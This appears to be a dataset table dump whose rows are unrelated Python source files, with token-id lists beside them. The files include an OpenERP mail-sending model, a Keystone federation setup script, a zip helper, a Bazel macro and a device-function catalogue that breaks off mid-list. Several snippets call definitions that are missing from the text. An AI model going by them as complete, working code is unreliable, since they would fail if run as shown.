content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import base64
import logging
import re
from urllib import urlencode
from urlparse import urljoin
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.osv.orm import except_orm
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class mail_mail(osv.Model):
""" Model holding RFC2822 email messages to send. This model also provides
facilities to queue and send new email messages. """
_name = 'mail.mail'
_description = 'Outgoing Mails'
_inherits = {'mail.message': 'mail_message_id'}
_order = 'id desc'
_columns = {
'mail_message_id': fields.many2one('mail.message', 'Message', required=True, ondelete='cascade'),
'mail_server_id': fields.many2one('ir.mail_server', 'Outgoing mail server', readonly=1),
'state': fields.selection([
('outgoing', 'Outgoing'),
('sent', 'Sent'),
('received', 'Received'),
('exception', 'Delivery Failed'),
('cancel', 'Cancelled'),
], 'Status', readonly=True),
'auto_delete': fields.boolean('Auto Delete',
help="Permanently delete this email after sending it, to save space"),
'references': fields.text('References', help='Message references, such as identifiers of previous messages', readonly=1),
'email_from': fields.char('From', help='Message sender, taken from user preferences.'),
'email_to': fields.text('To', help='Message recipients'),
'email_cc': fields.char('Cc', help='Carbon copy message recipients'),
'reply_to': fields.char('Reply-To', help='Preferred response address for the message'),
'body_html': fields.text('Rich-text Contents', help="Rich-text/HTML message"),
# Auto-detected based on create() - if 'mail_message_id' was passed then this mail is a notification
# and during unlink() we will not cascade delete the parent and its attachments
'notification': fields.boolean('Is Notification')
}
_defaults = {
'state': 'outgoing',
'email_from': lambda self, cr, uid, ctx=None: self._get_default_from(cr, uid, ctx),
}
def process_email_queue(self, cr, uid, ids=None, context=None):
"""Send immediately queued messages, committing after each
message is sent - this is not transactional and should
not be called during another transaction!
:param list ids: optional list of emails ids to send. If passed
no search is performed, and these ids are used
instead.
:param dict context: if a 'filters' key is present in context,
this value will be used as an additional
filter to further restrict the outgoing
messages to send (by default all 'outgoing'
messages are sent).
"""
if context is None:
context = {}
if not ids:
filters = ['&', ('state', '=', 'outgoing'), ('type', '=', 'email')]
if 'filters' in context:
filters.extend(context['filters'])
ids = self.search(cr, uid, filters, context=context)
res = None
try:
# Force auto-commit - this is meant to be called by
# the scheduler, and we can't allow rolling back the status
# of previously sent emails!
res = self.send(cr, uid, ids, auto_commit=True, context=context)
except Exception:
_logger.exception("Failed processing mail queue")
return res
def _postprocess_sent_message(self, cr, uid, mail, context=None):
"""Perform any post-processing necessary after sending ``mail``
successfully, including deleting it completely along with its
attachment if the ``auto_delete`` flag of the mail was set.
Overridden by subclasses for extra post-processing behaviors.
:param browse_record mail: the mail that was just sent
:return: True
"""
if mail.auto_delete:
# done with SUPERUSER_ID to avoid giving large unlink access rights
self.unlink(cr, SUPERUSER_ID, [mail.id], context=context)
return True
def send_get_mail_subject(self, cr, uid, mail, force=False, partner=None, context=None):
""" If subject is void and record_name defined: '<Author> posted on <Resource>'
:param boolean force: force the subject replacement
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if (force or not mail.subject) and mail.record_name:
return 'Re: %s' % (mail.record_name)
elif (force or not mail.subject) and mail.parent_id and mail.parent_id.subject:
return 'Re: %s' % (mail.parent_id.subject)
return mail.subject
def send_get_mail_body(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email body. The main purpose of this method
is to be inherited by Portal, to add a link for signing in, in
each notification email a partner receives.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = mail.body_html
# partner is a user, link to a related document (incentive to install portal)
if partner and partner.user_ids and mail.model and mail.res_id \
and self.check_access_rights(cr, partner.user_ids[0].id, 'read', raise_exception=False):
related_user = partner.user_ids[0]
try:
self.pool.get(mail.model).check_access_rule(cr, related_user.id, [mail.res_id], 'read', context=context)
base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# the parameters to encode for the query and fragment part of url
query = {'db': cr.dbname}
fragment = {
'login': related_user.login,
'model': mail.model,
'id': mail.res_id,
}
url = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
text = _("""<p>Access this document <a href="%s">directly in OpenERP</a></p>""") % url
body = tools.append_content_to_html(body, ("<div><p>%s</p></div>" % text), plaintext=False)
except except_orm, e:
pass
return body
def send_get_mail_reply_to(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email reply_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if mail.reply_to:
return mail.reply_to
email_reply_to = False
# if model and res_id: try to use ``message_get_reply_to`` that returns the document alias
if mail.model and mail.res_id and hasattr(self.pool.get(mail.model), 'message_get_reply_to'):
email_reply_to = self.pool.get(mail.model).message_get_reply_to(cr, uid, [mail.res_id], context=context)[0]
# no alias reply_to -> reply_to will be the email_from, only the email part
if not email_reply_to and mail.email_from:
emails = tools.email_split(mail.email_from)
if emails:
email_reply_to = emails[0]
# format 'Document name <email_address>'
if email_reply_to and mail.model and mail.res_id:
document_name = self.pool.get(mail.model).name_get(cr, SUPERUSER_ID, [mail.res_id], context=context)[0]
if document_name:
# sanitize document name
sanitized_doc_name = re.sub(r'[^\w+.]+', '-', document_name[1])
# generate reply to
email_reply_to = _('"Followers of %s" <%s>') % (sanitized_doc_name, email_reply_to)
return email_reply_to
def send_get_email_dict(self, cr, uid, mail, partner=None, context=None):
""" Return a dictionary for specific email values, depending on a
partner, or generic to the whole recipients given by mail.email_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = self.send_get_mail_body(cr, uid, mail, partner=partner, context=context)
subject = self.send_get_mail_subject(cr, uid, mail, partner=partner, context=context)
reply_to = self.send_get_mail_reply_to(cr, uid, mail, partner=partner, context=context)
body_alternative = tools.html2plaintext(body)
# generate email_to, heuristic:
# 1. if 'partner' is specified and there is a related document: Followers of 'Doc' <email>
# 2. if 'partner' is specified, but no related document: Partner Name <email>
# 3; fallback on mail.email_to that we split to have an email addresses list
if partner and mail.record_name:
sanitized_record_name = re.sub(r'[^\w+.]+', '-', mail.record_name)
email_to = [_('"Followers of %s" <%s>') % (sanitized_record_name, partner.email)]
elif partner:
email_to = ['%s <%s>' % (partner.name, partner.email)]
else:
email_to = tools.email_split(mail.email_to)
return {
'body': body,
'body_alternative': body_alternative,
'subject': subject,
'email_to': email_to,
'reply_to': reply_to,
}
def send(self, cr, uid, ids, auto_commit=False, recipient_ids=None, context=None):
""" Sends the selected emails immediately, ignoring their current
state (mails that have already been sent should not be passed
unless they should actually be re-sent).
Emails successfully delivered are marked as 'sent', and those
that fail to be deliver are marked as 'exception', and the
corresponding error mail is output in the server logs.
:param bool auto_commit: whether to force a commit of the mail status
after sending each mail (meant only for scheduler processing);
should never be True during normal transactions (default: False)
:param list recipient_ids: specific list of res.partner recipients.
If set, one email is sent to each partner. Its is possible to
tune the sent email through ``send_get_mail_body`` and ``send_get_mail_subject``.
If not specified, one email is sent to mail_mail.email_to.
:return: True
"""
ir_mail_server = self.pool.get('ir.mail_server')
for mail in self.browse(cr, uid, ids, context=context):
try:
# handle attachments
attachments = []
for attach in mail.attachment_ids:
attachments.append((attach.datas_fname, base64.b64decode(attach.datas)))
# specific behavior to customize the send email for notified partners
email_list = []
if recipient_ids:
partner_obj = self.pool.get('res.partner')
existing_recipient_ids = partner_obj.exists(cr, SUPERUSER_ID, recipient_ids, context=context)
for partner in partner_obj.browse(cr, SUPERUSER_ID, existing_recipient_ids, context=context):
email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))
else:
email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))
# build an RFC2822 email.message.Message object and send it without queuing
res = None
for email in email_list:
msg = ir_mail_server.build_email(
email_from = mail.email_from,
email_to = email.get('email_to'),
subject = email.get('subject'),
body = email.get('body'),
body_alternative = email.get('body_alternative'),
email_cc = tools.email_split(mail.email_cc),
reply_to = email.get('reply_to'),
attachments = attachments,
message_id = mail.message_id,
references = mail.references,
object_id = mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),
subtype = 'html',
subtype_alternative = 'plain')
res = ir_mail_server.send_email(cr, uid, msg,
mail_server_id=mail.mail_server_id.id, context=context)
if res:
mail.write({'state': 'sent', 'message_id': res})
mail_sent = True
else:
mail.write({'state': 'exception'})
mail_sent = False
# /!\ can't use mail.state here, as mail.refresh() will cause an error
# see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1
if mail_sent:
self._postprocess_sent_message(cr, uid, mail, context=context)
except MemoryError:
# prevent catching transient MemoryErrors, bubble up to notify user or abort cron job
# instead of marking the mail as failed
raise
except Exception:
_logger.exception('failed sending mail.mail %s', mail.id)
mail.write({'state': 'exception'})
if auto_commit == True:
cr.commit()
return True
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
29113,
29113,
7804,
4242,
2235,
198,
2,
198,
2,
220,
220,
220,
4946,
1137,
47,
11,
4946,
8090,
8549,
28186,
198,
2,
220,
220,
220,
15069,
357,
34,
8,
3050,
12,
40838... | 2.317446 | 6,483 |
# -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from io import BytesIO
from os import path, walk
from zipfile import ZipFile, ZIP_DEFLATED
from iconsdk.exception import ZipException
def gen_deploy_data_content(_path: str) -> bytes:
"""Generate bytes of zip data of SCORE.
:param _path: Path of the directory to be zipped.
"""
if path.isdir(_path) is False and path.isfile(_path) is False:
raise ValueError(f"Invalid path {_path}")
try:
memory_zip = InMemoryZip()
memory_zip.zip_in_memory(_path)
except ZipException:
raise ZipException(f"Can't zip SCORE contents")
else:
return memory_zip.data
class InMemoryZip:
"""Class for compressing data in memory using zip and BytesIO."""
@property
def data(self) -> bytes:
"""Returns zip data
:return: zip data
"""
self._in_memory.seek(0)
return self._in_memory.read()
def zip_in_memory(self, _path: str):
"""Compress zip data (bytes) in memory.
:param _path: The path of the directory to be zipped.
"""
try:
# when it is a zip file
if path.isfile(_path):
zf = ZipFile(_path, 'r', ZIP_DEFLATED, False)
zf.testzip()
with open(_path, mode='rb') as fp:
fp.seek(0)
self._in_memory.seek(0)
self._in_memory.write(fp.read())
else:
# root path for figuring out directory of tests
tmp_root = None
with ZipFile(self._in_memory, 'a', ZIP_DEFLATED, False, compresslevel=9) as zf:
for root, folders, files in walk(_path):
if 'package.json' in files:
tmp_root = root
if tmp_root and root.replace(tmp_root,'') == '/tests':
continue
if root.find('__pycache__') != -1:
continue
if root.find('/.') != -1:
continue
for file in files:
if file.startswith('.'):
continue
full_path = path.join(root, file)
zf.write(full_path)
except ZipException:
raise ZipException
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
15069,
2864,
314,
10943,
5693,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
42... | 2.117898 | 1,408 |
a = list(range(10))
slice1 = slice(0, 3)
slice2 = slice(4, 8)
print(a[slice1])
print(a[slice2])
a[slice2] = ["@", "#", "$", "%"]
print(a)
del a[slice1]
print(a)
print(f"slice start: {slice1.start}")
print(f"slice stop: {slice1.stop}")
print(f"slice step: {slice1.step}")
c = slice(0, 100, 3)
s = "0as0ef0df0vd0ef0d"
for i in range(*c.indices(len(s))):
print(s[i], end='')
| [
64,
796,
1351,
7,
9521,
7,
940,
4008,
198,
48369,
16,
796,
16416,
7,
15,
11,
513,
8,
198,
48369,
17,
796,
16416,
7,
19,
11,
807,
8,
198,
4798,
7,
64,
58,
48369,
16,
12962,
198,
4798,
7,
64,
58,
48369,
17,
12962,
198,
198,
64... | 2.059459 | 185 |
#!/usr/bin/env python
import ConfigParser
import requests
import json
cp = ConfigParser.SafeConfigParser()
cp.read('/etc/keystone/keystone.conf')
token = cp.get('DEFAULT', 'admin_token')
baseurl = 'http://localhost:35357/v3/OS-FEDERATION'
headers = {
'X-Auth-Token': token,
'Content-Type': 'application/json',
}
with open('/opt/himlar/json/create-idp.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
response.raise_for_status()
resp = requests.get('http://localhost:35357/v3/domains', headers=headers)
domains = resp.json()['domains']
domain_id = None
for domain in domains:
if domain['name'] == u'connect':
domain_id = domain['id']
if not domain_id:
raise Exception('Did not find domain "connect"')
with open('/opt/himlar/json/create-mapping.json') as fh:
data = fh.read()
data = data.replace('CONNECT_DOMAIN_ID', domain_id)
response = requests.put(baseurl + '/mappings/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/mappings/dataporten',
headers=headers, data=data)
response.raise_for_status()
with open('/opt/himlar/json/create-protocol.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
response.raise_for_status()
data = {
'group': {
'description': 'Gruppe for test med dataporten',
'domain_id': domain_id,
'name': 'dataporten_group',
}
}
response = requests.post('http://localhost:35357/v3/groups',
headers=headers, data=json.dumps(data))
if response.status_code not in (201, 409):
raise Exception('Could not create group')
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
11748,
17056,
46677,
198,
11748,
7007,
198,
11748,
33918,
198,
198,
13155,
796,
17056,
46677,
13,
31511,
16934,
46677,
3419,
198,
13155,
13,
961,
10786,
14,
14784,
14,
2539,
6440,
14,
25... | 2.323202 | 987 |
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from extensions.front.tf.concat_ext import ConcatFrontExtractor
from unit_tests.utils.extractors import PB, BaseExtractorsTestingClass
| [
2,
15069,
357,
34,
8,
2864,
12,
1238,
2481,
8180,
10501,
198,
2,
30628,
55,
12,
34156,
12,
33234,
7483,
25,
24843,
12,
17,
13,
15,
198,
198,
6738,
18366,
13,
8534,
13,
27110,
13,
1102,
9246,
62,
2302,
1330,
1482,
9246,
25886,
1162... | 3.318182 | 66 |
"""Defines a project macro used in every TokTok sub-project.
It checks constraints such as the use of the correct license and the presence
and correctness of the license text.
"""
_haskell_travis = rule(
attrs = {
"package": attr.string(mandatory = True),
"_template": attr.label(
default = Label("//tools/project:haskell_travis.yml.in"),
allow_single_file = True,
),
},
outputs = {"source_file": ".travis-expected.yml"},
implementation = _haskell_travis_impl,
)
def project(license = "gpl3", standard_travis = False):
"""Adds some checks to make sure the project is uniform."""
native.sh_test(
name = "license_test",
size = "small",
srcs = ["//tools/project:diff_test.sh"],
args = [
"$(location LICENSE)",
"$(location //tools:LICENSE.%s)" % license,
],
data = [
"LICENSE",
"//tools:LICENSE.%s" % license,
],
)
native.sh_test(
name = "readme_test",
size = "small",
srcs = ["//tools/project:readme_test.sh"],
args = ["$(location README.md)"],
data = ["README.md"],
)
native.sh_test(
name = "settings_test",
size = "small",
srcs = ["//tools/project:settings_test.sh"],
args = [
"$(location .github/settings.yml)",
# qTox is an exception. Maybe we should rename the submodule?
"qTox" if native.package_name() == "qtox" else native.package_name().replace("_", "-"),
],
data = [".github/settings.yml"],
)
if (native.package_name().startswith("hs-") and
any([f for f in native.glob(["*"]) if f.endswith(".cabal")])):
_haskell_project(
standard_travis = standard_travis,
)
| [
37811,
7469,
1127,
257,
1628,
15021,
973,
287,
790,
9453,
19042,
850,
12,
16302,
13,
198,
198,
1026,
8794,
17778,
884,
355,
262,
779,
286,
262,
3376,
5964,
290,
262,
4931,
198,
392,
29409,
286,
262,
5964,
2420,
13,
198,
37811,
198,
... | 2.194012 | 835 |
"""the simple baseline for autograph"""
import numpy as np
import pandas as pd
import torch
import torch.nn.functional as F
from torch.nn import Linear
from torch_geometric.nn import GCNConv, JumpingKnowledge
from torch_geometric.data import Data
from torch_geometric.nn import Node2Vec
from torch.utils.data import DataLoader
import networkx as nx
import random
from collections import Counter
from utils import normalize_features
import scipy.sparse as sp
from appnp import APPNPTrainer
from daydayup_model import GCNTrainer, TAGTrainer, XGBTrainer
from scipy import stats
from sklearn import preprocessing
import warnings
warnings.filterwarnings("ignore")
from daydayup_private_features import dayday_feature, dayday_feature_old
fix_seed(1234)
| [
37811,
1169,
2829,
14805,
329,
1960,
2384,
37811,
201,
198,
201,
198,
11748,
299,
32152,
355,
45941,
201,
198,
11748,
19798,
292,
355,
279,
67,
201,
198,
201,
198,
11748,
28034,
201,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
... | 3.007519 | 266 |
from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
| [
6738,
1366,
62,
320,
1819,
1010,
13,
27604,
13,
9503,
1746,
1330,
7308,
55,
8439,
11522,
17818,
42350,
34,
21370,
3546,
26634,
628
] | 3.608696 | 23 |
# -*- coding: utf-8 -*-
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#
# Copyright (c) 2019 Image Processing Research Group of University Federico II of Naples ('GRIP-UNINA').
# All rights reserved.
# This work should only be used for nonprofit purposes.
#
# By downloading and/or using any of these files, you implicitly agree to all the
# terms of the license, as specified in the document LICENSE.md
# (included in this package) and online at
# http://www.grip.unina.it/download/LICENSE_OPEN.txt
#
import numpy as np
from skimage.util import view_as_blocks,view_as_windows
from math import floor
from scipy.interpolate import interp2d
from scipy.io import savemat
################################################
import matplotlib.pyplot as plt
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
2,
4064,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
201,
198,
2,
201,
198,
2,
15069,
... | 3.184314 | 255 |
# pylint: disable=W0201
from Jumpscale import j
JSBASE = j.baseclasses.object
# Variables
functions = {}
func = Functions()
functions[1] = func
func.guid = 1
func.name = "GeneralModuleStatus"
func.description = "General status of a module"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[2] = func
func.guid = 2
func.name = "SpecificModuleStatus"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[3] = func
func.guid = 3
func.name = "CurrentTime"
func.description = "Unix timestamp of the current time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_TIMESTAMP"
func.valDef.size = 4
func.valDef.unit = "UNIX"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[4] = func
func.guid = 4
func.name = "Voltage"
func.description = "True RMS Voltage"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5] = func
func.guid = 5
func.name = "Frequency"
func.description = "Frequency"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "Hz"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[6] = func
func.guid = 6
func.name = "Current"
func.description = "Current true RMS"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[7] = func
func.guid = 7
func.name = "Power"
func.description = "Real Power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[8] = func
func.guid = 8
func.name = "StatePortCur"
func.description = "current port state"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[9] = func
func.guid = 9
func.name = "ActiveEnergy"
func.description = "Active Energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10] = func
func.guid = 10
func.name = "ApparentEnergy"
func.description = "Apparent Energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[11] = func
func.guid = 11
func.name = "Temperature"
func.description = "Temperature"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[12] = func
func.guid = 12
func.name = "Humidity"
func.description = "Humidity"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[13] = func
func.guid = 13
func.name = "FanSpeed"
func.description = "Fanspeed in Rounds per minute"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "rpm"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5000] = func
func.guid = 5000
func.name = "MaxCurrent"
func.description = "Maximum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5001] = func
func.guid = 5001
func.name = "MaxPower"
func.description = "Maximum port power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5002] = func
func.guid = 5002
func.name = "MaxTotalCurrent"
func.description = "Maximum total current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5003] = func
func.guid = 5003
func.name = "MaxTotalPower"
func.description = "Maximum total power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 8
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[5004] = func
func.guid = 5004
func.name = "MaxVoltage"
func.description = "Maximum voltage occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5005] = func
func.guid = 5005
func.name = "MinVoltage"
func.description = "Minimum voltage occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5006] = func
func.guid = 5006
func.name = "MinTemperature"
func.description = "Minimum temperature occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[5007] = func
func.guid = 5007
func.name = "MaxTemperature"
func.description = "Maximum temperature occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[5008] = func
func.guid = 5008
func.name = "MinHumidity"
func.description = "Minimum humidity occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5009] = func
func.guid = 5009
func.name = "MaxHumidity"
func.description = "Maximum humidity occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10000] = func
func.guid = 10000
func.name = "Address"
func.description = "Identification of the module"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
# ---------------------------------------------------------------------------
# Device function catalogue (GUIDs 10001 .. 10072 in registration order).
#
# Every entry publishes one Functions() record in the module-level
# ``functions`` mapping.  The original code repeated the same
# assignment sequence inline for each GUID; here the per-function data is
# kept in a table and applied by a single helper, which makes the catalogue
# far easier to scan and to extend.
# ---------------------------------------------------------------------------

def _register(guid, name, description, read, write, value_type, value_fields):
    """Create one Functions() record and store it under ``functions[guid]``.

    Mirrors the original inline construction exactly: the record is put into
    the ``functions`` dict first (same object, so populating it afterwards is
    equivalent), then the scalar attributes and the ``valDef`` Value() are
    filled in.  ``value_fields`` holds the optional value-definition
    attributes (size / length / unit / scale / min / max) that vary per type.
    Returns the new record.
    """
    entry = Functions()
    functions[guid] = entry  # publish first, populate after — same object
    entry.guid = guid
    entry.name = name
    entry.description = description
    entry.read = read
    entry.write = write
    entry.valDef = Value()
    entry.valDef.type = value_type
    for field_name, field_value in value_fields.items():
        setattr(entry.valDef, field_name, field_value)
    return entry


# Columns: (guid, name, description, read, write, valDef.type, valDef fields).
# NOTE(review): the ``max`` values (256 / 65536 / 4294967296 / 32768) look
# like exclusive upper bounds (2**bits); they are reproduced verbatim.
_FUNCTION_TABLE = [
    (10001, "ModuleName", "Module name", 1, 1, "TYPE_STRING", dict(length=16)),
    (10002, "FirmwareVersion", "Firmware version", 1, 0, "TYPE_VERSION", dict(size=4)),
    (10003, "HardwareVersion", "Hardware version", 1, 0, "TYPE_VERSION", dict(size=4)),
    (10004, "FirmwareID", "Identification of the firmware", 1, 0, "TYPE_STRING", dict(length=8)),
    (10005, "HardwareID", "Identification of the hardware", 1, 0, "TYPE_STRING", dict(length=8)),
    (10006, "RackName", "Rack Name", 1, 1, "TYPE_STRING", dict(length=16)),
    (10007, "RackPosition", "Position of the Energy Switch in the rack", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="", scale=0, min=0, max=65536)),
    (10008, "AdminLogin", "Admin Login", 1, 1, "TYPE_STRING", dict(length=16)),
    (10009, "AdminPassword", "Admin Password", 0, 1, "TYPE_STRING", dict(length=16)),
    (10010, "TemperatureUnitSelector", "", 1, 1, "TYPE_ENUM", dict(size=1)),
    (10011, "IPAddress", "IP-address", 1, 1, "TYPE_IP", dict(size=4)),
    (10012, "SubNetMask", "Subnetmask", 1, 1, "TYPE_SUBNETMASK", dict(size=4)),
    (10013, "StdGateWay", "Standard gateway IP", 1, 1, "TYPE_IP", dict(size=4)),
    (10014, "DnsServer", "Dns server IP", 1, 1, "TYPE_IP", dict(size=4)),
    (10015, "MAC", "MAC address", 1, 0, "TYPE_MAC", dict(size=6)),
    (10016, "DHCPEnable", "DHCP enable", 1, 1, "TYPE_ENUM", dict(size=1)),
    (10017, "NTPServer", "NTP server IP", 1, 1, "TYPE_IP", dict(size=4)),
